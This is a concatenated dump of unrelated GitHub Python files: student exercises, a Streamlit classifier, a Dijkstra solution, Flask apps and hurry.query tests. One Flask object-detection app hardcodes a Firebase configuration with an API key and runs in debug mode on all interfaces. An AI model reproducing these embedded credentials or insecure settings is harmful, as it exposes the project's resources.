MostPosNeg()\r\n            print(\"The most positive word in \"+ userFileName +\" is\", maxWord, \"with a score of\", maxNum)\r\n            print(\"The most negative word in \"+ userFileName +\" is\", minWord, \"with a score of\", minNum, \"\\n\")\r\n        if task == 4:\r\n            quit()\r\nmain()","repo_name":"Arius245/COS125-Projects","sub_path":"ahmad_p1.py","file_name":"ahmad_p1.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1282564062","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\nimport streamlit as st\n\nst.write(\"\"\"\n# Heart Failure Detection\n\"\"\")\nimage = Image.open('D:\\pythonProject\\ML\\Heart_failure\\heart.jpeg')\nst.image(image, caption='ML_Heart', use_column_width=True)\n\ndf = pd.read_csv('D:\\pythonProject\\ML\\Heart_failure\\heart.csv')\ndf.head()\n\n\ndf_eight = 
df[['Age','RestingBP','Cholesterol','FastingBS','MaxHR']]\n\nst.subheader('Data')\nst.dataframe(df_eight)\nst.write(df_eight.head())\n\nchart = st.line_chart(df_eight)\n\nX = df_eight.iloc[:, 0:5].values\nY = df_eight.iloc[:, -1].values\n#split to 75% training 25% testing\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25, random_state=0)\n\ndef get_user_input():\n Age = st.sidebar.slider('Age',0, 77, 50)\n RestingBP = st.sidebar.slider('RestingBP', 0, 200, 80)\n Cholesterol = st.sidebar.slider('Cholesterol', 0, 603, 150)\n FastingBS = st.sidebar.slider('FastingBS', 0, True)\n MaxHR = st.sidebar.slider('MaxHR', 0, 202, 60)\n\n user_data = {'Age':Age,\n 'RestingBP':RestingBP,\n 'Cholesterol':Cholesterol,\n 'FastingBS':FastingBS,\n 'MaxHR':MaxHR}\n\n features = pd.DataFrame(user_data, index=[0])\n return features\nuser = get_user_input()\n\nRandomForestClassifier = RandomForestClassifier()\nRandomForestClassifier.fit(X_train, Y_train)\n\nst.subheader('Model Score: ')\nst.write(str(accuracy_score(Y_test, RandomForestClassifier.predict(X_test))*100)+'%')\n\nprediction = RandomForestClassifier.predict(user)\n\n#Classification\nst.subheader('Classification')\nst.write(prediction)\n\n\n\n","repo_name":"despoina77/MachineLearning","sub_path":"Heart_failure/heart_failure.py","file_name":"heart_failure.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9330874468","text":"#Paul Kummer\n#CSIS 153\n#Program 10\n#Due 12/05/18\n\n__author__ = \"Paul Kummer\"\n__date__ = \"12/05/18\"\n\nfrom datetime import *\nfrom calendar import *\n\n\"\"\"\nDescription:\nV1:\nCreated functions to retrieve a year, month, and day that occured in the past.\nAdditionally, another function will calculate the difference between todays\ndate and the date entered. Error checking still needs to be implemented.\n\nV2:\nAllowed users to pass arguments into functions, and reverted to using datetime\ncalander limitations. Also, added getDailyFee and displayAmount Due functions\n\nV3:\n\"\"\"\n\n#global var\ntoday = date.today()\nprint(\"\\t### Today is {:} ###\\n\".format(today.strftime(\"%d %b, %Y\")))\n\n\ndef getYear(tmpUserYearStr=-1):\n\tnotValidYear = True\n\t\n\t#checks if user supplied an argument. Then prompts for input if no arg\n\tif tmpUserYearStr == -1:\n\t\ttmpUserYearStr = input(\"Please Enter a Year (example: 2018): \")\n\t\n\twhile notValidYear:\n\t\t\n\t\tif tmpUserYearStr == \"END\":\n\t\t\tnotValidYear = False\n\t\t\ttmpUserYearStr = -1\n\t\t\t\n\t\t#handles positive integers less than todays year, currently excludes zero\n\t\telif tmpUserYearStr.isdigit() and int(tmpUserYearStr) <= today.year\\\n\t\t\tand int(tmpUserYearStr) > 0:\n\t\t\tnotValidYear = False\n\t\t\t\n\t\t#handles negative integers, Does Not Work With BC Dates\n\t\t#elif tmpUserYearStr[1:].isdigit() and int(tmpUserYearStr) <= today.year\\\n\t\t#and not tmpUserYearStr[0] == \"-\":\n\t\t#\tnotValidYear = False\n\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Year Entry-\\n(Please enter an integer less than or equal to todays year)\")\n\t\t\ttmpUserYearStr = input(\"Please Enter a Year (example: 2018): \")\n\t\t\t\n\treturn int(tmpUserYearStr)\n\n\ndef getMonth(tmpUserMonthStr=-1):\n\tnotValidMonth = True\n\t\n\t#checks if user supplied an argument. 
Then prompts for input if no arg\n\tif tmpUserMonthStr == -1:\n\t\ttmpUserMonthStr = input(\"Please Enter a Month (example: 12): \")\n\t\n\twhile notValidMonth:\n\t\t\n\t\tif tmpUserMonthStr.isdigit() and int(tmpUserMonthStr) <= 12 and\\\n\t\t\tint(tmpUserMonthStr) > 0 and not tmpUserMonthStr.startswith(\"0\"):\n\t\t\tnotValidMonth = False\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Month Entry-\\n(Please enter an integer between 1-12 with no leading zeros)\")\n\t\t\ttmpUserMonthStr = input(\"Please Enter a Month (example: 12): \")\n\t\t\t\n\treturn int(tmpUserMonthStr)\n\t\n\t\ndef getDailyFee(tmpDailyFee=\"None\"):\n\tnotVaildFee = True\n\t\n\tif tmpDailyFee == \"None\":\n\t\ttmpDailyFee = input(\"What is the daily fee? (example 0.25): \")\n\t\n\twhile notVaildFee:\n\t\t#accept an optional leading minus sign, then digits with at most one decimal point\n\t\tdigits = tmpDailyFee[1:] if tmpDailyFee.startswith(\"-\") else tmpDailyFee\n\t\tvalidChars = tmpDailyFee.count(\".\") <= 1 and len(digits.strip(\".\")) > 0\n\t\tfor char in digits:\n\t\t\tif not (char.isdigit() or char == \".\"):\n\t\t\t\tvalidChars = False\n\t\t\t\t\n\t\tif validChars == True:\n\t\t\tnotVaildFee = False\t\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Entry-\\n(Please Enter a Floating Number)\")\n\t\t\ttmpDailyFee = input(\"What is the daily fee? (example 0.25): \")\n\t\t\t\n\treturn float(tmpDailyFee)\n\t\t\t\t\n\n\n#from https://docs.python.org/3/library/calendar.html\n#monthcalendar(year, month)\ndef getDay (tmpYear,tmpMonth,tmpUserDayStr=-1):\n\tmonthObj = monthcalendar(tmpYear,tmpMonth)\n\tmaxMonthRange = max(monthObj[len(monthObj)-1])\n\tnotValidDay = True\n\t\n\t#checks if user supplied an argument. Then prompts for input if no arg\n\tif tmpUserDayStr == -1:\n\t\ttmpUserDayStr = input(\"Please Enter a Day (between 1 and {:}): \"\\\n\t\t\t.format(maxMonthRange))\n\t\n\twhile notValidDay:\n\n\t\tif tmpUserDayStr.isdigit() and int(tmpUserDayStr) <= maxMonthRange\\\n\t\tand int(tmpUserDayStr) > 0:\n\t\t\tnotValidDay = False\n\t\t\t\n\t\telse:\n\t\t\tprint(\"\\t-Invalid Day Entry-\\n(Please enter an integer between 1 and {:})\"\\\n\t\t\t\t.format(maxMonthRange))\n\t\t\ttmpUserDayStr = input(\"Please Enter a Day (between 1 and {:}): \"\\\n\t\t\t\t.format(maxMonthRange))\n\t\t\t\n\treturn int(tmpUserDayStr)\n\n\ndef calcDiff (newestDate,oldestDate):\n\tdeltaDate = newestDate-oldestDate\n\tdeltaDaysInt = deltaDate.days\n\t\n\treturn deltaDaysInt\n\n\t\ndef calcLateFee(tmpDueDate,tmpCurDate,tmpDailyFee=0):\n\tdaysOverDue = calcDiff(tmpCurDate,tmpDueDate)\n\tbalanceIncurred = daysOverDue * tmpDailyFee\n\t\n\tif balanceIncurred < 0 or daysOverDue < 0:\n\t\tbalanceIncurred = 0\n\t\t\n\treturn float(balanceIncurred)\n\n\ndef displayTimePast():\n\tprint(\"\\n\\t:::: Calculate Time Past ::::\\n\")\n\tstayInLoop = True\n\t\n\twhile stayInLoop:\n\t\ttmpYear = getYear()\n\t\t\n\t\tif tmpYear == -1:\n\t\t\tstayInLoop = False\n\t\t\t\n\t\telse:\n\t\t\ttmpMonth = getMonth()\n\t\t\ttmpDay = getDay(tmpYear,tmpMonth)\n\t\t\ttmpDate = date(tmpYear,tmpMonth,tmpDay)\n\t\t\tdaysOfDifference = calcDiff(today,tmpDate)\n\t\n\t\t\tif daysOfDifference >= 365:\n\t\t\t\tdeltaYears = daysOfDifference//365\n\t\t\t\tdaysOfDifference = daysOfDifference-(deltaYears*365)\n\t\t\t\t\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\n{1:^.0f} years and {0:^.0f} days have passed between {2:} and today.\\n\"\\\n\t\t\t\t\t.format(daysOfDifference,deltaYears,tmpDate.strftime(\"%d %b, 
%Y\")))\n\t\t\t\t\n\t\t\telif daysOfDifference >= 0:\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\n{:3^.0f} days have passed between {:} and today.\\n\"\\\n\t\t\t\t\t.format(daysOfDifference,tmpDate.strftime(\"%d %b, %Y\")))\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tprint(\"\\n\\t### Time Difference ###\\nThe date entered is in the future and has no days passed\\n\")\n\t\n\t\ndef displayAmountDue():\n\tprint(\"\\n\\t:::: Calculate Amount Due ::::\")\n\tstayInLoop = True\n\n\twhile stayInLoop:\n\t\tprint(\"\\n\\t### Enter Due Date ###\")\n\t\ttmpYearDue = getYear()\n\t\tif tmpYearDue == -1:\n\t\t\tstayInLoop = False\n\t\t\t\n\t\telse:\n\t\t\ttmpMonthDue = getMonth()\n\t\t\ttmpDayDue = getDay(tmpYearDue,tmpMonthDue)\n\t\t\ttmpDateDue = date(tmpYearDue,tmpMonthDue,tmpDayDue)\n\t\t\n\t\t\n\t\tif stayInLoop == True:\n\t\t\tprint(\"\\n\\t### Enter Borrowed Date ###\")\n\t\t\ttmpYearBorrowed = getYear()\n\t\t\tif tmpYearBorrowed == -1:\n\t\t\t\tstayInLoop = False\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttmpMonthBorrowed = getMonth()\n\t\t\t\ttmpDayBorrowed = getDay(tmpYearBorrowed,tmpMonthBorrowed)\n\t\t\t\ttmpDateBorrowed = date(tmpYearBorrowed,tmpMonthBorrowed,tmpDayBorrowed)\n\t\t\t\n\t\t\t\tprint(\"\\n\\t### Enter Daily Fee ###\")\n\t\t\t\ttmpFee = getDailyFee()\n\t\t\t\tbalanceDue = calcLateFee(tmpDateBorrowed,tmpDateDue,tmpFee)\t\n\t\t\t\tprint(\"\\n\\tThe total amount due is ${:<.2f}\\n\".format(balanceDue))\n \n\ndisplayTimePast()\ndisplayAmountDue()\n\n\"\"\"\n\nPart 3: (5 pts)\n\n    Call the getYear function to obtain a year from the user.\n\n    Print the month and the first Friday of every month in that year.\n    HINT: use the monthcalendar method to obtain a calendar object that contains the months for that year:\n    myFebCal = calendar.monthcalendar(2016, 2)\n\n(monthcalendar returns a matrix representing a month’s calendar).\n\nwk1 = myFebCal[1] # Each row represents a week.\n\n\n    Example:\n    Year: 2016\n\nFirst Fridays of every month in year 2016:\nJanuary 8\nFebruary 12\nMarch 11\nApril 8\nMay 6\nJune 10\nJuly 8\nAugust 12\nSeptember 9\nOctober 7\nNovember 11\nDecember 9\n\nScoring Guide:\n\nPart 1\n\n    getYear function with appropriate error checking 1 pt\n    getMonth function with appropriate error 1 pt\n    getDay function with appropriate error 2 pts\n\n    calcDiff takes 2 parameters, returns difference of the dates (4 pts).\n    checks to make sure a negative # isn’t returned -2 if no check\n\n    # of days incorrect -2\n\n    # of years incorrect -2\n\n    Loops continuously until user types END (2 pts)\n\nPart 2\n\n    calcLateFee takes 2 date objects as params and daily fee (float). 
2 pts\n\n Correctly calculates and returns total late fee or 0 if no late fee 3 pts\n\nPart 3\n\n Correctly determines the day # of the first Friday of the month for the given year 4 pts\n\n Output includes the MONTH and the day# 1 pt\n\n\n\n\"\"\"\n","repo_name":"Paul-Kummer/CSIS153","sub_path":"Programs/Program10/Paul_Kummer_Program10_V2.py","file_name":"Paul_Kummer_Program10_V2.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70886876353","text":"import numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\nfrom flask import Flask, flash, request, Response, redirect, url_for, render_template\nfrom werkzeug.utils import secure_filename\nimport jsonpickle\nimport io as StringIO\nimport base64\nfrom io import BytesIO\nimport io\nimport json\nfrom PIL import Image\nimport pyrebase\n\n\nconfig = {\n\n \"apiKey\": \"AIzaSyCzEM-a7piep6yfNwaZaRSA5NiDzYDRRO8\",\n \"authDomain\": \"object-detection-yolo-cdf10.firebaseapp.com\",\n \"databaseURL\": \"https://object-detection-yolo-cdf10.firebaseio.com\",\n \"projectId\": \"object-detection-yolo-cdf10\",\n \"storageBucket\": \"object-detection-yolo-cdf10.appspot.com\",\n \"messagingSenderId\": \"940165302494\",\n \"appId\": \"1:940165302494:web:edffa29d72752bbd1d1a4f\",\n \"measurementId\": \"G-DY7RH14R5P\"\n\n\n}\n\nfirebase = pyrebase.initialize_app(config)\n\nstorage = firebase.storage()\n\nconfthres = 0.5\nnmsthres = 0.4\nmy_path = './'\n\ndef get_labels(labels_path):\n lpath=os.path.sep.join([my_path, labels_path])\n LABELS = open(lpath).read().strip().split(\"\\n\")\n return LABELS\n\ndef get_colors(LABELS):\n np.random.seed(42)\n COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype=\"uint8\")\n return COLORS\n\ndef get_weights(weights_path):\n weightsPath = os.path.sep.join([my_path, weights_path])\n return weightsPath\n\ndef get_config(config_path):\n configPath = os.path.sep.join([my_path, config_path])\n return configPath\n\n\n\ndef load_model(configpath,weightspath):\n print(\"[INFO] loading Gsoc Model from disk...\")\n net = cv2.dnn.readNetFromDarknet(configpath, weightspath)\n return net\n\n\ndef image_to_byte_array(image:Image):\n imgByteArr = io.BytesIO()\n image.save(imgByteArr, format='PNG')\n imgByteArr = imgByteArr.getvalue()\n return imgByteArr\n\n\ndef detect_it(image,net,LABELS,COLORS):\n (H, W) = image.shape[:2]\n ln = net.getLayerNames()\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),\n swapRB=True, crop=False)\n net.setInput(blob)\n start = time.time()\n layerOutputs = net.forward(ln)\n print(layerOutputs)\n end = time.time()\n\n print(\"[INFO] Gsoc Model took {:.6f} seconds\".format(end - start))\n\n boxes = []\n confidences = []\n classIDs = []\n\n for output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > confthres:\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype(\"int\")\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, confthres,\n nmsthres)\n\n if len(idxs) > 0:\n for i in idxs.flatten():\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n color = [int(c) for c in 
COLORS[classIDs[i]]]\n            cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n            text = \"{}: {:.4f}\".format(LABELS[classIDs[i]], confidences[i])\n            print(boxes)\n            print(classIDs)\n            cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, color, 2)\n    return image\n\nlabelsPath=\"gsoc_model/coco.names\"\ncfgpath=\"gsoc_model/gsoc.cfg\"\nwpath=\"gsoc_model/gsoc.weights\"\nLables=get_labels(labelsPath)\nCFG=get_config(cfgpath)\nWeights=get_weights(wpath)\nnets=load_model(CFG,Weights)\nColors=get_colors(Lables)\n\n# Initialize the Flask application\napp = Flask(__name__)\n\napp.config[\"ALLOWED_EXTENSIONS\"] = [\"png\", \"jpg\", \"jpeg\"]\n\ndef allowed_file(filename):\n    return \".\" in filename and \\\n        filename.rsplit(\".\", 1)[1].lower() in app.config[\"ALLOWED_EXTENSIONS\"]\n\n# route http posts to this method\n@app.route(\"/api\", methods=[\"GET\", \"POST\"])\ndef main():\n    \n    if request.method == \"POST\":\n        if \"file_input\" not in request.files:\n            flash(\"No file part\")\n            return redirect(request.url)\n\n        file = request.files[\"file_input\"]\n\n        if file.filename == \"\":\n            flash(\"No selected file\")\n            return redirect(request.url)\n\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            img = request.files[\"file_input\"].read()\n            \n            img = Image.open(io.BytesIO(img))\n            npimg=np.array(img)\n            image=npimg.copy()\n            image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n\n            res=detect_it(image,nets,Lables,Colors) \n            \n            image=cv2.cvtColor(res,cv2.COLOR_BGR2RGB)\n            np_img=Image.fromarray(image)\n            img_encoded=image_to_byte_array(np_img)\n            mimetype=\"image/jpeg\"\n            \n            storage.child(\"images/object_detected.jpg\").put(img_encoded)\n            \n            # print(storage.child(\"banner.jpg\").get_url(None))\n            # path = 'static/images'\n            # cv2.imwrite(os.path.join(path , \"object.jpg\"), res)\n            # cv2.imwrite(\"object.jpg\", res) \n            \n            # return render_template(\"result.html\", img_url=img_url)\n            links = storage.child(\"images/object_detected.jpg\").get_url(None)\n            return render_template(\"result.html\", l = links)\n            # imageF = Image.open(io.BytesIO(img_encoded))\n            \n            # return render_template(\"result.html\", img_encoded=imageF)\n    return render_template(\"index.html\")\n    # return Response(response=img_encoded, status=200,mimetype=\"image/jpeg\")\n\n    # start flask app\nif __name__ == '__main__':\n    app.secret_key = \"key_key\"\n    app.run(debug=True, host='0.0.0.0')\n\n\n\n","repo_name":"Digaari/caMicroscope","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42712964836","text":"\n\nfrom collections import deque\nimport sys\n\n\ndef read():\n    return sys.stdin.readline().rstrip()\n\n\ndef solution(st, ed):\n    global n, g\n    inf = 100000*100000\n    dist = [inf for _ in range(n)]\n    visit = [False for _ in range(n)]\n    from_ = [-1 for _ in range(n)]\n    dist[st] = 0\n\n    selected = st\n    while selected != ed:\n        visit[selected] = True\n        for (to, cost) in g[selected]:\n            #dist[to] = min(dist[to], dist[selected]+cost)\n            if dist[selected]+cost < dist[to]:\n                from_[to] = selected\n                dist[to] = dist[selected]+cost\n        # select\n        min_dist = inf\n        for (i, d) in enumerate(dist):\n            if visit[i]:\n                continue\n            if d < min_dist:\n                min_dist = d\n                selected = i\n\n    route = []\n    prev = ed\n    while prev != -1:\n        route.append(prev)\n        prev = from_[prev]\n\n    route.reverse()\n    route = list(map(lambda x: x+1, route))\n    return (dist[ed], route)\n\n\nn = int(read())\nm = int(read())\ng = [[] 
for _ in range(n)]\n\nfor _ in range(m):\n fr, to, cost = map(int, read().split())\n g[fr-1].append((to-1, cost))\n\nx, y = map(int, read().split())\n\n(cost, route) = solution(x-1, y-1)\nroute = list(map(str, route))\n\nprint(cost)\nprint(len(route))\nprint(' '.join(route))\n","repo_name":"SJ0000/PS","sub_path":"BOJ/BOJ_11779.py","file_name":"BOJ_11779.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37308093037","text":"from flask import Flask, render_template, request\napp = Flask(__name__)\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hello_world():\n a = \"\"\n country = ['Russia', 'Italy', 'USA']\n print(request.form)\n if request.method == \"POST\":\n if request.form.get(\"country_list\") == 'USA':\n a = 'RED'\n return render_template(\"index.html\", country=country, a=a)\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='80')","repo_name":"ZeroShka/pythonskills","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70133963716","text":"class Ventilador:\n def __init__(self, cor, potencia, tensao, preco):\n self.preco = preco\n self.__cor = cor\n self.__potencia = potencia\n self.__tensao = tensao\n\n def cor(self):\n return self.__cor\n\n\nclass Pessoa:\n def __init__(self, nome, saldo_na_conta):\n self.nome = nome\n self.saldo_na_conta = saldo_na_conta\n self.ventilador = None\n\n def comprar_ventilador(self, ventilador):\n if ventilador.preco <= self.saldo_na_conta:\n self.saldo_na_conta -= ventilador.preco\n self.ventilador = ventilador\n\n def __str__(self) -> str:\n if self.ventilador:\n return f\"{ self.nome } - possui um ventilador\"\n return f\"{ self.nome } - não possui um ventilador\"\n\n\nventilador_potente = Ventilador(\"preto\", potencia=250, tensao=220, preco=100)\ncomprador = Pessoa(nome=\"Daniel\", saldo_na_conta=500)\ncomprador.comprar_ventilador(ventilador_potente)\n\ncomprador2 = Pessoa(\"Eduarda\", 50)\n\nprint(comprador)\nprint(comprador2)\n","repo_name":"DannOut/Trybe-exercicios","sub_path":"P.O.O-Python/examples/fixacao1.py","file_name":"fixacao1.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4634408978","text":"import functools\nimport time\nimport unittest\n\nimport zope.component.testing\nimport zope.intid.interfaces\nfrom testfixtures import LogCapture\nfrom zope.catalog.catalog import Catalog\nfrom zope.catalog.field import FieldIndex\nfrom zope.catalog.interfaces import ICatalog\nfrom zope.catalog.text import TextIndex\nfrom zope.component import getUtility\nfrom zope.component import provideUtility\nfrom zope.container.contained import Contained\nfrom zope.interface import Attribute\nfrom zope.interface import Interface\nfrom zope.interface import implementer\n\nfrom hurry.query import query\nfrom hurry.query.interfaces import IQuery\n\n\n\"\"\"Bring `query` testcoverage to 100% without polluting the doctest\"\"\"\n\n\nclass IContent(Interface):\n f1 = Attribute('f1')\n f2 = Attribute('f2')\n f3 = Attribute('f3')\n f4 = Attribute('f4')\n t1 = Attribute('t1')\n t2 = Attribute('t2')\n\n\n@functools.total_ordering\n@implementer(IContent)\nclass Content(Contained):\n\n def __init__(self, id, f1='', f2='', f3='', f4='', t1='', t2=''):\n self.id = id\n self.f1 = f1\n self.f2 = f2\n self.f3 = 
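
The BOJ 11779 solution above runs Dijkstra with an O(V^2) linear scan to pick the next vertex and reconstructs the route through a `from_` array. For larger graphs the standard refinement is a priority queue; a self-contained sketch of the same idea on a toy adjacency list (not the judge's input format):

```python
# O(E log V) Dijkstra with predecessor tracking, via a heap instead of
# the linear scan used above. The graph below is a small made-up example.
import heapq

def dijkstra(adj, src, dst):
    INF = float("inf")
    dist = [INF] * len(adj)
    prev = [-1] * len(adj)
    dist[src] = 0
    pq = [(0, src)]
    while pq:
        d, u = heapq.heappop(pq)
        if d > dist[u]:
            continue  # stale heap entry, a shorter path was already found
        for v, w in adj[u]:
            if d + w < dist[v]:
                dist[v] = d + w
                prev[v] = u
                heapq.heappush(pq, (dist[v], v))
    # walk predecessors back from dst to recover the route
    route = []
    node = dst
    while node != -1:
        route.append(node)
        node = prev[node]
    return dist[dst], route[::-1]

adj = [[(1, 2), (2, 5)], [(2, 1)], []]  # 0->1 (2), 0->2 (5), 1->2 (1)
print(dijkstra(adj, 0, 2))  # (3, [0, 1, 2])
```
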
f3\n self.f4 = f4\n self.t1 = t1\n self.t2 = t2\n\n def __lt__(self, other):\n return self.id < other.id\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __repr__(self):\n return f'<Content \"{self.id}\">'\n\n\n@implementer(zope.intid.interfaces.IIntIds)\nclass DummyIntId:\n MARKER = '__dummy_int_id__'\n\n def __init__(self):\n self.counter = 0\n self.data = {}\n\n def register(self, obj):\n intid = getattr(obj, self.MARKER, None)\n if intid is None:\n setattr(obj, self.MARKER, self.counter)\n self.data[self.counter] = obj\n intid = self.counter\n self.counter += 1\n return intid\n\n def getId(self, obj):\n return getattr(obj, self.MARKER)\n\n def getObject(self, intid):\n return self.data[intid]\n\n def __iter__(self):\n return iter(self.data)\n\n\nf1 = ('catalog1', 'f1')\n\n\nclass QueryTestBase(unittest.TestCase):\n\n tearDown = zope.component.testing.tearDown\n\n def setUp(self):\n \"\"\"emulate the doctest fixtures\"\"\"\n self.intid = DummyIntId()\n provideUtility(self.intid, zope.intid.interfaces.IIntIds)\n self.catalog = Catalog()\n provideUtility(self.catalog, ICatalog, 'catalog1')\n self.catalog['f1'] = FieldIndex('f1', IContent)\n self.catalog['f2'] = FieldIndex('f2', IContent)\n self.catalog['f3'] = FieldIndex('f3', IContent)\n self.catalog['f4'] = FieldIndex('f4', IContent)\n self.catalog['t1'] = TextIndex('t1', IContent)\n self.catalog['t2'] = TextIndex('t2', IContent)\n provideUtility(query.Query(), IQuery)\n self.setup_content()\n\n def setup_content(self):\n content = [\n Content(1, 'a', 'b', 'd'),\n Content(2, 'a', 'c'),\n Content(3, 'X', 'c'),\n Content(4, 'a', 'b', 'e'),\n Content(5, 'X', 'b', 'e'),\n Content(6, 'Y', 'Z')]\n for entry in content:\n self.catalog.index_doc(self.intid.register(entry), entry)\n\n def searchResults(self, q, **kw):\n query = getUtility(IQuery)\n return query.searchResults(q, **kw)\n\n def displayQuery(self, q, **kw):\n r = self.searchResults(q, **kw)\n return [e.id for e in sorted(list(r))]\n\n def test_setup(self):\n \"\"\"verify test fixtures by reproducing first doctest\"\"\"\n self.assertEqual(self.displayQuery(\n query.All(f1)),\n [1, 2, 3, 4, 5, 6])\n\n\nclass TimingTest(QueryTestBase):\n\n def test_init(self):\n timer = query.Timing('foo', 1)\n self.assertEqual(timer.key, 'foo')\n self.assertGreater(timer.start, 0)\n self.assertEqual(timer.start_order, 1)\n self.assertEqual(timer.end, None)\n self.assertEqual(timer.end_order, None)\n\n def test_done(self):\n timer = query.Timing()\n timer.done(2)\n self.assertGreater(timer.end, 0)\n self.assertEqual(timer.end_order, 2)\n\n def test_total(self):\n timer = query.Timing()\n time.sleep(.1)\n timer.done()\n self.assertGreater(timer.total, 0)\n\n def test_total_wo_end(self):\n timer = query.Timing()\n self.assertEqual(timer.total, None)\n\n\nclass TimingAwareCacheTest(QueryTestBase):\n\n def test_init(self):\n cache = query.TimingAwareCache({})\n self.assertEqual(cache.cache, {})\n self.assertEqual(cache.timing, {})\n self.assertEqual(cache.count, 0)\n self.assertEqual(cache.post, None)\n\n def test_start_post(self):\n cache = query.TimingAwareCache({})\n cache.start_post()\n self.assertGreater(cache.post.start, 0)\n\n def test_end_post(self):\n cache = query.TimingAwareCache({})\n with self.assertRaises(AttributeError):\n cache.end_post()\n\n cache.start_post()\n time.sleep(0.1)\n cache.end_post()\n self.assertGreater(cache.post.total, 0)\n\n def test_get_uncached(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n 
self.assertEqual(cache.count, 0)\n value = cache.get('foo')\n self.assertEqual(value, None)\n self.assertTrue('foo' in cache.timing)\n self.assertGreater(cache.timing['foo'].start, 0)\n self.assertEqual(cache.timing['foo'].end, None)\n self.assertEqual(cache.count, 1)\n\n def test_get_cached(self):\n cache = query.TimingAwareCache({'foo': 'bar'})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n value = cache.get('foo')\n self.assertEqual(value, 'bar')\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n\n def test_dunder_setitem(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n cache['foo'] = 'bar'\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n\n def test_dunder_setitem_timing(self):\n cache = query.TimingAwareCache({})\n self.assertFalse('foo' in cache.timing)\n self.assertEqual(cache.count, 0)\n cache.get('foo')\n self.assertEqual(cache.count, 1)\n cache['foo'] = 'bar'\n self.assertTrue('foo' in cache.timing)\n self.assertGreater(cache.timing['foo'].start, 0)\n self.assertGreater(cache.timing['foo'].end, 0)\n self.assertEqual(cache.count, 2)\n\n def test_report_empty(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.report()\n records = logged.records\n\n self.assertEqual(records, [])\n\n def test_report_uncached(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.report()\n records = logged.records\n\n self.assertEqual(records[0].levelname, 'INFO')\n self.assertEqual(records[0].module, 'query')\n self.assertIn('Catalog query', records[0].msg)\n self.assertIn('s for terms', records[0].msg)\n self.assertIn('s to finish', records[0].msg)\n self.assertIn('s: foo', records[1].msg)\n\n def test_report_uncached_post(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.end_post()\n cache.report()\n records = logged.records\n\n self.assertEqual(records[0].levelname, 'INFO')\n self.assertEqual(records[0].module, 'query')\n self.assertIn('Catalog query', records[0].msg)\n self.assertIn('s for terms', records[0].msg)\n self.assertIn('s to finish', records[0].msg)\n self.assertIn('s: foo', records[1].msg)\n\n def test_report_uncached_post_under_over(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache['foo'] = 'bar'\n cache.end_post()\n cache.report(over=1)\n records = logged.records\n\n self.assertEqual(records, [])\n\n def test_report_uncached_mixedup_order(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.get('foobar')\n cache['foobar'] = 'foobar'\n cache.get('foo')\n cache.get('bar')\n cache['bar'] = 'bar'\n cache['foo'] = 'foo'\n cache.get('baz')\n cache['baz'] = 'baz'\n cache.report()\n records = logged.records\n\n # verify dedent from 5 spaces to 1 space\n self.assertEqual(len(records[1].msg) - 